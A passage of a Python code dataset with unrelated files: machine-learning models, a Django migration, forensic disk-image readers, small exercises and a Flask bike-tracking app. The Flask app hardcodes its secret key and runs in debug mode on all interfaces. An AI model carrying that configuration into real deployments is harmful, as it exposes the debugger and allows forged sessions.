print(res)","sub_path":"Code/CodeRecords/2381/61046/310480.py","file_name":"310480.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"208469067","text":"\nimport tensorflow as tf\nimport numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.io import savemat\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom scipy.stats import mode \nimport pandas as pd\nimport matplotlib.pyplot as plt \nfrom sklearn.metrics import roc_auc_score\n\n\ndef data_partitionMA(X,Y,t,ind,frac,seed):\n import math\n \"\"\" Function to partition data into train, test\n ind --> matrix with shufled index (w,N) where w are the different possible random states\n frac --> fraction of data for training\n seed --> fixed random state for reproducibility\n \"\"\"\n N = X.shape[0]\n Xtrain = X[ind[seed][:math.ceil(N*frac)]]\n Ytrain = Y[ind[seed][:math.ceil(N*frac)]]\n ttrain = t[ind[seed][:math.ceil(N*frac)]]\n\n Xtest = X[ind[seed][math.ceil(N*frac):]]\n Ytest = Y[ind[seed][math.ceil(N*frac):]]\n ttest = t[ind[seed][math.ceil(N*frac):]]\n\n return Xtrain, Ytrain, ttrain, Xtest, Ytest, ttest\n\ndef ook(t):\n\n if len(np.unique(t))!=2:\n lb = LabelBinarizer()\n y_ook = lb.fit_transform(t)\n else:\n lb = LabelBinarizer()\n y_ook = lb.fit_transform(t)\n y_ook = np.concatenate((1-y_ook.astype(bool), y_ook), axis = 1) \n\n return y_ook\n\n\ndef bin_Y(Y):\n lb = LabelBinarizer()\n lb.fit(np.unique(Y))\n N = Y.shape[0] \n K = len(np.unique(Y))\n R = Y.shape[1]\n Ynew = np.zeros([N,K,R])\n for i in range(N):\n\n if K != 2:\n y_b = lb.transform(Y[i])\n\n else:\n y_b = lb.transform(Y[i])\n y_b = np.concatenate((1-y_b.astype(bool), y_b), axis = 1) \n\n Ynew[i,:,:] = y_b.T\n\n return Ynew\n\nfrom sklearn.base import BaseEstimator, TransformerMixin, ClassifierMixin\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\n # Define custom loss\ndef custom_loss(K,R):\n #pi [N,R]\n\n #@tf.function() #decorador para operar sobre python, mas lento y poco efectivo en muchos casos\n # Create a loss function that adds the MSE loss to the mean of all squared activations of a specific layer\n def max_like(y_true, y_pred): # y_true [batch_size, K, R]\n #kernels###############################################\n N = y_true.shape[0]\n #K = y_pred[:, R:].shape[1]\n #K = np.unique(y_true).size\n y_hat = tf.repeat(tf.expand_dims(y_pred[:, :K],-1), R, axis = -1)\n\n pi = y_pred[:, K:]\n\n p_logreg = tf.math.reduce_prod(tf.math.pow(y_hat, y_true), axis=1)\n\n temp1 = pi*p_logreg \n temp2 = (1-pi)/K\n Zp = temp1/tf.math.add(temp1,temp2)\n \n #Likelihood \n\n temp1 = Zp*tf.math.log(pi*p_logreg) \n temp2 = (1-Zp)*tf.math.log((1-pi)*1/K) \n\n #####funcion de costo############################################\n f = -tf.math.reduce_sum(tf.math.add(temp1,temp2))\n return f\n \n # Return a function\n return max_like\n\ndef scheduler1(step = 8, ratio = 1.2):\n def scheduler(epoch, lr):\n if epoch % step == 0 and epoch>1:\n return lr/ratio\n else:\n return lr\n return scheduler\n\n\ndef scheduler2(epoch, lr):\n if epoch < 10:\n return lr\n else:\n return lr * tf.math.exp(-0.01)\n\n\nclass Keras_MA_pi_lin(BaseEstimator, TransformerMixin):\n def __init__(self, K, R, P, epochs=30,batch_size=64,learning_rate=1e-3,optimizer='RMS',\n l1_param=1e-3,l2_param=1e-3,validation_split=0.3,verbose=1,\n w_init=False, w2_init=False, ratio = 1.2):\n self.epochs = epochs\n self.batch_size = batch_size\n self.learning_rate=learning_rate \n self.l1_param=l1_param \n self.l2_param=l2_param\n self.validation_split = validation_split\n self.verbose = verbose\n self.optimizer = optimizer\n self.w_init = w_init\n self.w2_init = w2_init\n self.ratio = ratio\n self.K = K\n self.R = R\n self.P = P\n\n \n def fit(self, X, t):\n #lb = LabelBinarizer()\n #lb.fit(X[:,-1])\n #N = X.shape[0]\n #y = np.zeros([N, self.K, self.R])\n #for i in range(N):\n # y[i,:,:] = binarize(X[i,self.P:],lb).T\n\n y = bin_Y(X[:,self.P:])\n\n Xt = X[:,:self.P]\n if self.optimizer == \"Adam\":\n opt = tf.keras.optimizers.Adam(learning_rate=self.learning_rate)\n elif self.optimizer == \"SGD\":\n opt = tf.keras.optimizers.SGD(learning_rate=self.learning_rate)\n elif self.optimizer == \"RMS\":\n opt = tf.keras.optimizers.RMSprop(learning_rate=self.learning_rate)\n else:\n opt=self.optimizer\n\n \n ###acomodar arquitectura de red###### \n tf.keras.backend.clear_session()\n\n inputA = tf.keras.layers.Input(shape=(Xt.shape[1]), name='entradaA')\n\n Q1 = self.K ## num clases\n Q2 = self.R ## num anotadores\n l1 = self.l1_param\n l2 = self.l2_param\n \n if self.w_init.any():\n initializer = tf.keras.initializers.Constant(value=self.w_init)\n else:\n initializer = tf.random_uniform_initializer(minval=-1, maxval=1)\n\n if self.w2_init.any():\n initializer2 = tf.keras.initializers.Constant(value=self.w2_init)\n else:\n initializer2 = tf.random_uniform_initializer(minval=-1, maxval=1)\n\n hW = tf.keras.layers.Dense(Q1,activation='softmax',name='Yhat', kernel_initializer=initializer, bias_initializer='zeros',\n kernel_regularizer=tf.keras.regularizers.l1_l2(l1=l1,l2=l2))(inputA)\n \n hW2 = tf.keras.layers.Dense(Q2,activation='sigmoid',name='PI', kernel_initializer=initializer2, bias_initializer='zeros',\n kernel_regularizer=tf.keras.regularizers.l1_l2(l1=l1,l2=l2))(inputA)\n\n concAB = tf.keras.layers.concatenate([hW,hW2],name='concAB')\n\n self.model = tf.keras.Model(inputs=inputA, outputs=concAB)\n self.model.compile(loss=custom_loss(K=self.K, R= self.R), \n optimizer=opt) #f1, precision, recall, crossentropy\n\n callback1 = tf.keras.callbacks.TerminateOnNaN()\n callback2 = tf.keras.callbacks.LearningRateScheduler(scheduler1(ratio = self.ratio))\n #callback2 = tf.keras.callbacks.LearningRateScheduler(scheduler2)\n callback3 = tf.keras.callbacks.EarlyStopping(monitor=\"loss\", min_delta=1e-3,\n patience=10, verbose=0, mode=\"auto\",\n baseline=None, restore_best_weights=True)\n\n \n self.history = self.model.fit(x = Xt, y = y,\n epochs=self.epochs,batch_size=self.batch_size,\n validation_split=self.validation_split, \n callbacks = [callback1, callback2, callback3], \n verbose = self.verbose)\n \n def predict(self, X, *_):\n pred = self.model.predict(X[:,:self.P])[:,:self.K]\n return np.argmax(pred, axis=1)\n \n def predict_proba(self, X, *_):\n pred = self.model.predict(X[:,:self.P])[:,:self.K]\n return pred\n\n def plot_history_loss(self):\n plt.plot(self.history.history['loss'],label='loss')\n plt.plot(self.history.history['val_loss'],label='val_loss')\n plt.legend()\n return\n \n def score(self, X, t):\n accuracy = np.mean(self.predict(X)==t.T)\n\n try:\n auc = roc_auc_score(ook(t), self.predict_proba(X))\n except:\n auc = 0.5\n \n dist = np.sqrt((np.mean(accuracy)-1)**2+(np.mean(auc)-1)**2)\n\n return -dist\n","sub_path":"models/MA_pi_linear_keras.py","file_name":"MA_pi_linear_keras.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"174845259","text":"# -*- coding: utf-8 -*-\nimport psutil\nimport sys\nfrom bench_from_pid import BenchFromPid\nfrom b3j0f.conf import Configurable\nfrom time import sleep\n\n\n@Configurable(paths='bench.conf')\nclass FromName(object):\n\n def __init__(self, names, *args, **kwargs):\n super(FromName, self).__init__(*args, **kwargs)\n self.names = names\n self.instances = []\n\n def launch(self):\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid', 'name'])\n except psutil.NoSuchProcess:\n pass\n else:\n if pinfo['name'] in self.names:\n print(pinfo['name'], pinfo['pid'])\n self.instances.append(BenchFromPid(pinfo['pid']))\n for i in self.instances:\n i.start()\n sleep(self.duration)\n for i in self.instances:\n i.stop()\n i.join()\n\nif __name__ == '__main__':\n args = sys.argv\n args.pop(0)\n fromname = FromName(args)\n fromname.launch()\n","sub_path":"dowan/benchmarker/from_name.py","file_name":"from_name.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"277776561","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='article',\n name='tid',\n field=models.CharField(unique=True, verbose_name='文章的唯一ID', max_length=64, blank=True),\n ),\n migrations.AlterField(\n model_name='article',\n name='category',\n field=models.ForeignKey(verbose_name='类别', to='article.cate', related_name='article_cate'),\n ),\n migrations.AlterField(\n model_name='cate',\n name='cate_addtime',\n field=models.DateTimeField(verbose_name='类别添加时间', blank=True),\n ),\n ]\n","sub_path":"blog/article/migrations/0002_auto_20160819_1631.py","file_name":"0002_auto_20160819_1631.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"165123424","text":"# === Import Section === #\nfrom flask import ( Flask, \n render_template,\n url_for,\n redirect, \n request, \n flash )\n\nfrom helper import ( getAvatar,\n getFollowerStats,\n )\n\nfrom dbHelper import ( getYearlySummary,\n syncStravaActivities, \n getBikeMileage, \n getYearlyGoals, \n addUpdateGoal, \n doBikesExist, \n addBike2DB,\n getMyBikes,\n removeBikeFromDB,\n addBikeNotes,\n getBikeNotes )\n\nfrom charts import ( monthlyMileageBarChart,\n last4WeeksDotChart )\n# === Import Section === #\n\n# Initialize Flask object\napp = Flask(__name__)\napp.secret_key = 'i234aessser54234lajdflkjasdlkjf;oiadalkjuhpoiqw'\n\n# Index Route \n@app.route('/')\ndef index():\n yearlySummary = getYearlySummary()\n myAvatar = getAvatar()\n followerStats = getFollowerStats()\n totalMiles = totalTime = 0\n for row in yearlySummary:\n totalMiles = totalMiles + row[1]\n totalTime = totalTime + row[2]\n totalKms = int(float(totalMiles) * 1.60934)\n totalSummaryList = [totalMiles, totalKms, totalTime]\n monthlyMileageData = monthlyMileageBarChart()\n last4WeeksDotData = last4WeeksDotChart()\n bikeMileage = getBikeMileage()\n# yearlySummary = totalSummaryList = monthlyMileageData = speedStatsData = last4WeeksDotData = bikeMileage = None\n return render_template('index.html', \n followerStats=followerStats,\n myAvatar=myAvatar,\n yearlySummary=yearlySummary,\n totalSummaryList=totalSummaryList,\n monthlyMileageData=monthlyMileageData,\n last4WeeksDotData=last4WeeksDotData,\n bikeMileage=bikeMileage,\n )\n\n# Goals Route\n@app.route('/goals')\ndef goals():\n followerStats = getFollowerStats()\n yearlyGoals = getYearlyGoals()\n return render_template('goals.html',\n followerStats=followerStats,\n yearlyGoals=yearlyGoals)\n\n# My Bikes Route\n@app.route('/mybikes', methods=['GET', 'POST'])\ndef mybikes():\n myBikesData = None\n bikeNotes = None\n followerStats = getFollowerStats()\n if doBikesExist():\n myBikesData = getMyBikes()\n else:\n flash(\"You don't have any bikes added. Please add a bike using the button above!!\")\n if request.method == \"POST\":\n bikeNotes = getBikeNotes(request.form['name'])\n return render_template('mybikes.html',\n followerStats=followerStats,\n myBikesData=myBikesData,\n bikeNotes=bikeNotes)\n\n# Sync Strava activities\n@app.route('/syncstrava')\ndef syncstrava():\n activitiesSynced = syncStravaActivities()\n if activitiesSynced is None:\n flash(\"No more activities to sync!!\")\n else:\n flash(\"Cool!! %d new activities synced from Strava\" % activitiesSynced)\n return redirect(url_for('index'))\n\n# Update Goal Route\n@app.route('/updateGoal', methods=['POST'])\ndef updateGoal():\n if request.method == \"POST\":\n curYearGoal = request.form['goal']\n if not curYearGoal:\n flash(\"Please enter a distance goal in miles before clicking Update\")\n else:\n goalUpdate = addUpdateGoal(int(curYearGoal))\n if goalUpdate is True:\n flash(\"Goals Updated!!\")\n else:\n flash(\"Operation failed!!\")\n return redirect(url_for('goals'))\n\n# Add Bike Route\n@app.route('/addbike', methods=['POST'])\ndef addbike():\n name = request.form['name']\n purchasedon = request.form['purchasedon']\n purchasedfrom = request.form['purchasedfrom']\n cost = request.form['cost']\n comments = request.form['comments']\n bike = {\n 'name' : name,\n 'purchasedon' : purchasedon,\n 'purchasedfrom' : purchasedfrom,\n 'cost' : float(cost),\n 'comments' : comments\n }\n addBike2DB(bike)\n return redirect(url_for('mybikes'))\n\n# Remove Bike Route\n@app.route('/removebike/')\ndef removebike(bike):\n removeBikeFromDB(bike)\n return redirect(url_for('mybikes'))\n\n# Add Bike Notes Route\n@app.route('/addbikeNotes', methods=['POST'])\ndef addbikeNotes():\n bikeNotes = {\n 'name' : request.form['name'],\n 'date' : request.form['date'],\n 'notes': request.form['notes'],\n 'cost' : float(request.form['cost'])\n }\n addBikeNotes(bikeNotes)\n return redirect(url_for('mybikes'))\n\n# Main Function\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8004, debug=True)\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"83756291","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport bisect\nimport sys\n\nimport pyewf\nimport pyvmdk\nimport pyvhdi\nimport pytsk3\nimport pyqcow\n\n#import pyaff\n\nclass CARPE_Image(pytsk3.Img_Info):\n def __init__(self, img_hanle):\n super(CARPE_Image, self).__init__()\n self._partition_table = pytsk3.Volume_Info(img_hanle)\n\nclass vhdi_img_info(pytsk3.Img_Info):\n def __init__(self, vhdi_file):\n self._vhdi_file = vhdi_file\n super(vhdi_img_info, self).__init__(\n url=\"\", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n self._vhdi_file.close()\n\n def read(self, offset, size):\n self._vhdi_file.seek(offset)\n return self._vhdi_file.read(size)\n\n def get_size(self):\n return self._vhdi_file.get_media_size()\n\nclass vmdk_img_info(pytsk3.Img_Info):\n def __init__(self, vmdk_handle):\n self._vmdk_handle = vmdk_handle\n super(vmdk_img_info, self).__init__(\n url=\"\", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n self._vmdk_handle.close()\n\n def read(self, offset, size):\n self._vmdk_handle.seek(offset)\n return self._vmdk_handle.read(size)\n\n def get_size(self):\n return self._vmdk_handle.get_media_size()\n\nclass ewf_img_info(pytsk3.Img_Info):\n \"\"\"\n An image info class which uses ewf as a backing reader.\n\n All we really need to do to provide TSK with the ability to read image formats\n is override the methods below.\n \"\"\"\n def __init__(self, ewf_handle):\n # stores ewf_handle in class as new variable\n self._ewf_handle = ewf_handle\n super(ewf_img_info, self).__init__(\n url=\"\", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n \n # The following methods override pytsk3's Img_Info methods which would not know how to handle the e01 image\n # close Closes a ewf object\n def close(self):\n self._ewf_handle.close()\n # end of close -----------------------------------\n \n # read allows an e01 file to be opened/read by specifying where the file system info is on the image\n def read(self, offset, size):\n self._ewf_handle.seek(offset)\n return self._ewf_handle.read(size)\n # end of read ------------------------------------------------\n \n # get_size gets the size of the image\n def get_size(self):\n return self._ewf_handle.get_media_size()\n\nclass QcowImgInfo(pytsk3.Img_Info):\n def __init__(self, filename):\n self._qcow_file = pyqcow.file()\n self._qcow_file.open(filename)\n super(QcowImgInfo, self).__init__(\n url='', type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n self._qcow_file.close()\n\n def read(self, offset, size):\n self._qcow_file.seek(offset)\n return self._qcow_file.read(size)\n\n def get_size(self):\n return self._qcow_file.get_media_size()\n\nclass SplitImage(pytsk3.Img_Info):\n \"\"\"\n Virtualize access to split images.\n\n Note that unlike other tools (e.g. affuse) we do not assume that the images\n are the same size.\n \"\"\"\n\n def __init__(self, *files):\n self.fds = []\n self.offsets = [0]\n offset = 0\n\n for fd in files:\n # Support either a filename or file like objects\n if not hasattr(fd, \"read\"):\n fd = open(fd, \"rb\")\n\n fd.seek(0,2)\n\n offset += fd.tell()\n self.offsets.append(offset)\n self.fds.append(fd)\n\n self.size = offset\n\n # Make sure to call the original base constructor.\n pytsk3.Img_Info.__init__(self, \"\")\n\n def get_size(self):\n return self.size\n\n def read(self, offset, length):\n \"\"\"\n Read a buffer from the split image set.\n Handles the buffer straddling images.\n \"\"\"\n result = \"\"\n\n # The total available size in the file\n length = int(length)\n length = min(length, int(self.size) - offset)\n\n while length > 0:\n data = self._ReadPartial(offset, length)\n if not data: break\n\n length -= len(data)\n result += data\n offset += len(data)\n\n return result\n\n def _ReadPartial(self, offset, length):\n \"\"\"Read as much as we can from the current image.\"\"\"\n # The part we need to read from.\n idx = bisect.bisect_right(self.offsets, offset + 1) - 1\n fd = self.fds[idx]\n\n # The offset this part is in the overall image\n img_offset = self.offsets[idx]\n fd.seek(offset - img_offset)\n\n # This can return less than length\n return fd.read(length)\n\ndef SelectImage(img_type, files):\n if img_type == \"raw\":\n return pytsk3.Img_Info(files)\n\n elif img_type == \"ewf\":\n filename = pyewf.glob(*files)\n ewf_handle = pyewf.handle()\n ewf_handle.open(filename)\n return ewf_img_info(ewf_handle)\n \n elif img_type == \"vmdk\":\n vmdk_handle = pyvmdk.handle()\n vmdk_handle.open(files)\n return vmdk_img_info(vmdk_handle)\n\n elif img_type == \"vhdi\":\n vhdi_handle = pyvhdi.file()\n vhdi_handle.open(files)\n return vhdi_img_info(vhdi_handle)\n\n elif img_type == \"qcow\":\n return QcowImgInfo(files[0])\n \n''' \n elif img_type == \"aff\":\n aff_handle = pyaff.handle()\n'''","sub_path":"filesystem_analyzer/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211010325","text":"import numpy as np\nimport logging\nimport json as js\nimport tensorflow as tf\nimport utils.plot_functions as pf\nfrom models.base_model import Model\n\nclass ICA(Model):\n def __init__(self, params, schedule):\n Model.__init__(self, params, schedule)\n self.build_graph()\n Model.setup_graph(self, self.graph)\n\n \"\"\"\n Load parameters into object\n Inputs:\n params: [dict] model parameters\n Modifiable Parameters:\n norm_weights [bool] If set, l2 normalize weights after updates\n prior [str] Prior for ICA - can be \"laplacian\" or \"cauchy\"\n batch_size [int] Number of images in a training batch\n num_pixels [int] Number of pixels\n \"\"\"\n def load_params(self, params):\n Model.load_params(self, params)\n # Meta parameters\n self.norm_weights = bool(params[\"norm_weights\"])\n self.prior = str(params[\"prior\"])\n assert (True if self.prior.lower() in (\"laplacian\", \"cauchy\") else False), (\n \"Prior must be 'laplacian' or 'cauchy'\")\n # Network Size\n self.batch_size = int(params[\"batch_size\"])\n self.num_pixels = int(params[\"num_pixels\"])\n self.num_neurons = self.num_pixels\n self.a_shape = [self.num_pixels, self.num_neurons]\n\n \"\"\"Check parameters with assertions\"\"\"\n def check_params(self):\n Model.check_params(self)\n assert np.sqrt(self.num_pixels) == np.floor(np.sqrt(self.num_pixels)), (\n \"The parameter `num_pixels` must have an even square-root.\")\n\n \"\"\"Build the TensorFlow graph object\"\"\"\n def build_graph(self):\n self.graph = tf.Graph()\n with tf.device(self.device):\n with self.graph.as_default():\n with tf.name_scope(\"placeholders\") as scope:\n self.x = tf.placeholder(\n tf.float32, shape=[self.num_pixels, None], name=\"input_data\")\n\n with tf.name_scope(\"step_counter\") as scope:\n self.global_step = tf.Variable(0, trainable=False, name=\"global_step\")\n\n with tf.variable_scope(\"weights\") as scope:\n self.a = tf.get_variable(name=\"a\", dtype=tf.float32,\n initializer=tf.truncated_normal(self.a_shape, mean=0.0,\n stddev=1.0, dtype=tf.float32, name=\"a_init\"), trainable=True)\n\n with tf.name_scope(\"normalize_weights\") as scope:\n self.norm_a = self.a.assign(tf.nn.l2_normalize(self.a,\n dim=0, epsilon=self.eps, name=\"row_l2_norm\"))\n self.normalize_weights = tf.group(self.norm_a,\n name=\"l2_normalization\")\n\n with tf.name_scope(\"inference\") as scope:\n self.u = tf.matmul(tf.matrix_inverse(self.a, name=\"a_inverse\"),\n self.x, name=\"coefficients\")\n if self.prior.lower() == \"laplacian\":\n self.z = tf.sign(self.u)\n else: #It must be laplacian or cauchy, assert in load_params()\n self.z = (2*self.u) / (1 + tf.pow(self.u, 2.0))\n\n self.graph_built = True\n\n \"\"\"\n Returns the gradients for a weight variable\n NOTE:\n This child function does not use optimizer input\n Weights must be a list with a single matrix (\"a\") in it\n \"\"\"\n def compute_gradients(self, optimizer, weight_op=None):\n assert len(weight_op) == 1, (\"ICA should only have one weight matrix\")\n z_avg = tf.div(tf.matmul(self.z, tf.transpose(self.u)),\n tf.to_float(tf.shape(self.x)[1]), name=\"avg_samples\")\n weight_name = weight_op[0].name.split('/')[1].split(':')[0]\n gradient = tf.sub(tf.matmul(weight_op[0], z_avg), weight_op[0],\n name=weight_name+\"_gradient\")\n return [(gradient, weight_op[0])]\n\n \"\"\"\n input_data: data object containing the current image batch\n input_labels: data object containing the current label batch\n batch_step: current batch number within the schedule\n NOTE: Casting tf.eval output to an np.array and then to a list is required to\n ensure that the data type is valid for js.dumps(). An alternative would be\n to write an np function that converts numpy types to their corresponding\n python types.\n \"\"\"\n def print_update(self, input_data, input_labels=None, batch_step=0):\n Model.print_update(self, input_data, input_labels, batch_step)\n feed_dict = self.get_feed_dict(input_data, input_labels)\n current_step = np.array(self.global_step.eval()).tolist()\n u_vals = tf.get_default_session().run(self.u, feed_dict)\n u_vals_max = np.array(u_vals.max()).tolist()\n u_frac_act = np.array(np.count_nonzero(u_vals)\n / float(self.num_neurons * self.batch_size)).tolist()\n stat_dict = {\"global_batch_index\":current_step,\n \"batch_step\":batch_step,\n \"number_of_batch_steps\":self.get_sched(\"num_batches\"),\n \"schedule_index\":self.sched_idx,\n \"u_max\":u_vals_max,\n \"u_fraction_active\":u_frac_act}\n for weight_grad_var in self.grads_and_vars[self.sched_idx]:\n grad = weight_grad_var[0][0].eval(feed_dict)\n name = weight_grad_var[0][1].name.split('/')[1].split(':')[0]\n stat_dict[name+\"_max_grad\"] = np.array(grad.max()).tolist()\n stat_dict[name+\"_min_grad\"] = np.array(grad.min()).tolist()\n js_str = js.dumps(stat_dict, sort_keys=True, indent=2)\n self.log_info(\"\"+js_str+\"\")\n\n \"\"\"\n Plot weights, reconstruction, and gradients\n Inputs:\n input_data: data object containing the current image batch\n input_labels: data object containing the current label batch\n \"\"\"\n def generate_plots(self, input_data, input_labels=None):\n Model.generate_plots(self, input_data, input_labels)\n feed_dict = self.get_feed_dict(input_data, input_labels)\n current_step = str(self.global_step.eval())\n pf.save_data_tiled(input_data.T.reshape((self.batch_size,\n np.int(np.sqrt(self.num_pixels)),\n np.int(np.sqrt(self.num_pixels)))),\n normalize=False, title=\"Images at step \"+current_step,\n save_filename=(self.disp_dir+\"images_\"\n +current_step.zfill(5)+\".pdf\"),\n vmin=np.min(input_data), vmax=np.max(input_data))\n pf.save_data_tiled(\n tf.transpose(self.a).eval().reshape(self.num_neurons,\n int(np.sqrt(self.num_pixels)), int(np.sqrt(self.num_pixels))),\n normalize=True, title=\"Dictionary at step \"+current_step,\n save_filename=(self.disp_dir+\"a_v\"+self.version+\"-\"\n +current_step.zfill(5)+\".pdf\"))\n for weight_grad_var in self.grads_and_vars[self.sched_idx]:\n grad = weight_grad_var[0][0].eval(feed_dict)\n shape = grad.shape\n name = weight_grad_var[0][1].name.split('/')[1].split(':')[0]\n pf.save_data_tiled(grad.T.reshape(self.num_neurons,\n int(np.sqrt(self.num_pixels)), int(np.sqrt(self.num_pixels))),\n normalize=True, title=\"Gradient for \"+name+\" at step \"+current_step,\n save_filename=(self.disp_dir+\"d\"+name+\"_v\"+self.version+\"_\"\n +current_step.zfill(5)+\".pdf\"))\n","sub_path":"models/ica.py","file_name":"ica.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"148272745","text":"def perrin(n):\n if n == 0:\n return 3\n elif n == 1:\n return 0\n elif n == 2:\n return 2\n return perrin(n-2) + perrin(n-3)\n\nprint(perrin(1)) \nprint(perrin(8)) \nprint(perrin(26)) ","sub_path":"Edabit/อ๋า-20210505T210557Z-001/อ๋า/edabit/the perrin sequence.py","file_name":"the perrin sequence.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"574535524","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n Для кодування повідомлень Френсіс Бекон запропонував кожну літеру тексту замінювати на групу з п'яти символів «А» або «B» (назвемо їх \"ab-групами\"). Для співставлення літер і кодуючих ab-груп в даному завданні використовується ключ-ланцюжок aaaaabbbbbabbbaabbababbaaababaab, в якому порядковий номер літери відповідає порядковому номеру початку ab-групи.\n Літера \"а\" - перша літера алфавіту; для визначення її коду беремо 5 символів з ключа, починаючи з першого: aaaaa. Літера \"c\" - третя в алфавіті, отже для визначення її коду беремо 5 символів з ключа, починаючи з третього: aaabb.\nВхідні дані:\n Рядок, передається в програму як аргумент командного рядка. Може містити пробіли та літери латинського алфавіту в будь-якому регістрі. Для передачі в якості одного аргументу рядок береться в подвійні лапки.\nВихідні дані:\n Рядок - дешифроване повідомлення.\nПриклад:\n Вхідні дані: I canT DAnCE i CANt TAlK Hey\n Результат: wiki\n Вхідні дані: Hot sUn BEATIng dOWN bURNINg mY FEet JuSt WalKIng arOUnD HOt suN mAkiNG me SWeat\n Результат: wewillrockyou\n'''\n\nimport sys, re\n\nkey = 'aaaaabbbbbabbbaabbababbaaababaab'\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\n\ndic = {}\ndecrypted = ''\n\nfor i in range(len(alphabet)):\n dic[key[i:i+5]] = alphabet[i]\n\nencrypted = re.findall('.{5}', sys.argv[1].replace(' ', ''))\n\nfor word in encrypted:\n token = ''\n for letter in word:\n if letter.islower():\n token += 'a'\n else:\n token += 'b'\n decrypted += dic[token]\n\nprint(decrypted)\n\n","sub_path":"lesson_04_M.py","file_name":"lesson_04_M.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"472925371","text":"import logging\nimport unittest\n\n\n\"\"\"MaxProfit (https://codility.com/demo/take-sample-test/max_profit/)\n\nAnalysis:\n - change delta\n - change lower bound value\n\"\"\"\n\n__author__ = 'au9ustine'\nlogging.basicConfig(format='%(message)s', level=logging.DEBUG)\n\n\ndef solution(A):\n if len(A) < 2:\n return 0\n profit = 0\n price_lower_bound = A[0]\n for i in xrange(1, len(A)):\n profit = max(profit, A[i] - price_lower_bound)\n price_lower_bound = min(A[i], price_lower_bound)\n return profit\n\n\nclass SolutionTest(unittest.TestCase):\n\n def setUp(self):\n self.data = [\n ([23171, 21011, 21123, 21366, 21013, 21367], 356)\n ]\n\n def test_solution(self):\n for input_data, expected in self.data:\n actual = solution(input_data)\n self.assertEquals(expected, actual)\n\nif __name__ == \"__main__\":\n unittest.main(failfast=True)","sub_path":"lessons/lesson07_maximum_slice_problem/MaxProfit.py","file_name":"MaxProfit.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"635562803","text":"#!/usr/bin/env python\n\n\"\"\"\nSpatial analysis of lung tissue\n\"\"\"\n\nfrom typing import Union\n\nimport parmap\nimport scipy.ndimage as ndi\nimport skimage as ski\nimport skimage.feature\nfrom skimage.exposure import equalize_hist as eq\nimport tifffile\nimport pingouin as pg\nimport numpy_groupies as npg\nfrom anndata import AnnData\nimport scanpy as sc\n\nfrom imc.types import Path, Array\n\nfrom src.config import *\n\n\noutput_dir = results_dir / \"supervised\"\noutput_dir.mkdir()\n\n\nprj.sample_comparisons(\n sample_attributes=roi_attributes.columns[:2].tolist(),\n output_prefix=output_dir / \"comparisons.\",\n channel_exclude=channels_exclude,\n)\n\n\ndf = prj.clusters.reset_index()\nc = df[\"cluster\"].value_counts()\nc = c[c > 500].index.tolist()\n\ndf = df.loc[df[\"cluster\"].isin(c)]\ndf = df.loc[~df[\"cluster\"].isin([\"?\", \"\"])]\n\ndf = df.merge(roi_attributes, left_on=\"roi\", right_index=True)\n\nperc = (\n df.groupby(\"roi\")\n .apply(lambda x: (x[\"cluster\"].value_counts() / x.shape[0]) * 100)\n .rename(\"percentage\")\n)\nperc = roi_attributes.join(perc)\nperc.index.names = [\"roi\", \"cluster\"]\n\n\n# grid = sns.catplot(\n# data=perc.reset_index(),\n# x=\"cluster\",\n# y=\"percentage\",\n# hue=attr,\n# kind=\"boxen\",\n# )\n\n_test_res = list()\nfor attr in roi_attributes.columns:\n # Test for differences\n aov = pd.concat(\n [\n pg.anova(\n data=perc.loc[perc.index.get_level_values(1) == val],\n dv=\"percentage\",\n between=attr,\n ).assign(variable=val)\n for val in perc.index.levels[1]\n ]\n ).set_index(\"variable\")\n _test_res.append(aov)\n\n kws = dict(\n data=perc.reset_index(), x=attr, y=\"percentage\", palette=\"tab10\",\n )\n grid = sns.FacetGrid(\n data=perc.reset_index(),\n col=\"cluster\",\n height=3,\n col_wrap=4,\n sharey=False,\n )\n grid.map_dataframe(sns.boxenplot, saturation=0.5, dodge=False, **kws)\n for ax in grid.axes.flat:\n [\n x.set_alpha(0.25)\n for x in ax.get_children()\n if isinstance(\n x,\n (\n 